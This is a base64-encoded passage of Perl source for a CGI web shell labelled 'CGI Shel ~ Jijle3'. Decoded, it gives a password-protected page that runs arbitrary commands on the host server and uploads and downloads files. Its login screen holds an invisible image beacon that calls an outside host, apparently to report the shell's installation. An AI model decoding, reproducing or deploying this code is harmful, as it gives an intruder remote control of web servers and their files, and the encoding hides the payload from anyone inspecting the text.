9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlVwbG9hZCBGaWxlPC9mb250PjwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RG93bmxvYWQgRmlsZTwvZm9udD48L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRpc2Nvbm5lY3Q8L2ZvbnQ+PC9hPiB8DQo8L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KPGZvbnQgc2l6ZT0iMyI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCgkkTWVzc2FnZSA9IHEkPC9mb250PjxoMT4NCkNHSSBTaGVsIH4gSmlqbGUzDQo8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxuZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIzIj4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij48L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJcHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2luIGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUNCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBhZ2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQgZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBhc3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJJlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFzc3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJCX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0Kew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5hbWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3JpcHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBpcw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0KCXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFuZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRoZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQgIiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5kVGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAiIHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRfXG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdpbk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMgZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsNCglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8gdGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlWPVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5EDQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNURE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShTRU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0KIyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlzIHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXS